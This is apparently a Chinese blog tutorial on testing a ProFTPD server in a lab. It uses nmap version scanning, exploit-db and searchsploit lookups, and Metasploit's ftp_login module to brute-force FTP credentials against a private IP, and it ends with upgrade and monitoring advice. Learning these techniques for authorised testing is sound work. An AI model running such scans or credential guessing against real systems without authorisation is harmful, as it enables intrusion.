当前位置:网站首页>6-20漏洞利用-proftpd测试
6-20漏洞利用-proftpd测试
2022-07-28 17:10:00 【山兔1】

proftpd介绍
ProFTPD:一个Unix平台上或是类Unix平台上(如Linux,FreeBSD等)的FTP服务器程序
http://www.proftpd.org/

可以下载对应的版本,然后进行环境搭建
探测目标proftpd
使用nmap -sV -p 2121 IP地址 探测目标proftpd版本信息

在这里,我们可以清晰的探测到版本信息
我们先探测目标开放的端口
nmap 192.168.1.105
下面,我们就使用具体的版本信息,来探测目标信息
nmap -sV -p 2121 192.168.1.105
以上,我们就完成了对应的版本探测
exploit-db搜索目标漏洞
在https://www.exploit-db.com/输入对应软件及版本搜索是否有漏洞

如果没有搜索出来,说明这个版本没有具体的漏洞
searchsploit proftpd 1.3

可以看到这个是1.3的漏洞
searchsploit proftpd 1.3.1

我们看到1.3.1也是没有搜索出对应的漏洞,当然,我们也可以拿proftpd版本的漏洞,在这上面尝试
msf暴力破解
使用metasploit下的 auxiliary/scanner/ftp/ftp_login 进行目标探测

可以看到有很多的漏洞,我们可以根据实际情况,下载版本进行测试,我们从官网下载,即可安装搭建,可以看到有很多的rce漏洞
msfconsole
use auxiliary/scanner/ftp/ftp_login
show options

set rhosts 192.168.1.105
set rport 2121

我们在设置的时候,可以设置21号端口,前提是,这个端口,运行ftp服务,rhosts是一定要设置具体的IP地址,或者CIDR,就会对当前下的IP地址,进行猜解
set username msfadmin

实际情况下,我们也可以设置对应的用户文件
set password msfadmin
run

1、将软件升级到最新的版本,不存在漏洞的版本
2、加强监控,对当前的系统加强监控,关闭不必要的端口
边栏推荐
- QT - CPP database operation
- The wechat installation package has expanded 575 times in 11 years, and the up owner: "98% of the documents are garbage"; Apple App store was exposed to a large number of pornographic apps; Four techn
- Interpretation of ue4.25 slate source code
- Decimal to binary advanced version (can convert negative numbers and boundary values)
- QT running image
- Mongodb initialization
- Kotlin:sealed Class detailed explanation of sealed class
- 【雷达】基于核聚类实现雷达信号在线分选附matlab代码
- kotlin:out in
- [machine learning] support vector machine classification
猜你喜欢

Introduction and advanced level of MySQL (I)

Introduction and advanced level of MySQL (II)

Introduction and advanced MySQL (7)

【物理应用】大气吸收损耗附matlab代码

AI 改变千行万业,开发者如何投身 AI 语音新“声”态

湖上建仓全解析:如何打造湖仓一体数据平台 | DEEPNOVA技术荟系列公开课第四期

N32替换STM32,这些细节别忽略!

视频融合云服务EasyCVR平台白名单功能如何使用?

Interviewer: what are the usage scenarios of ThreadLocal? How to avoid memory leakage?
![[machine learning] support vector machine classification](/img/6d/e4fb9b5bf82362edcebbf366f9b73e.png)
[machine learning] support vector machine classification
随机推荐
ECS 5 workflow
kotlin:out in
PyG搭建异质图注意力网络HAN实现DBLP节点预测
QT with line encoding output cout
408 review strategy (strengthening stage)
Is there a future for changing careers in learning software testing?
2、 Uni app login function page Jump
2022杭电多校第二场1011 DOS Card(线段树)
112. Use the self-developed proxy server to solve the cross domain access error encountered when uploading files by SAP ui5 fileuploader
How to choose between software testing and software development?
What if you don't understand the difference between modularity, componentization and plug-in?
GC garbage collector details
Is software testing really as good as online?
C and SQL mixed programming, vs need to download what things
真正的 HTAP 对用户和开发者意味着什么?
Open source database innovation in the era of digital economy | the 2022 open atom global open source summit database sub forum was successfully held
Redis advantages and data structure related knowledge
4 年后,Debian 终夺回“debian.community”域名!
AI has changed thousands of industries. How can developers devote themselves to the new "sound" state of AI voice
What does real HTAP mean to users and developers?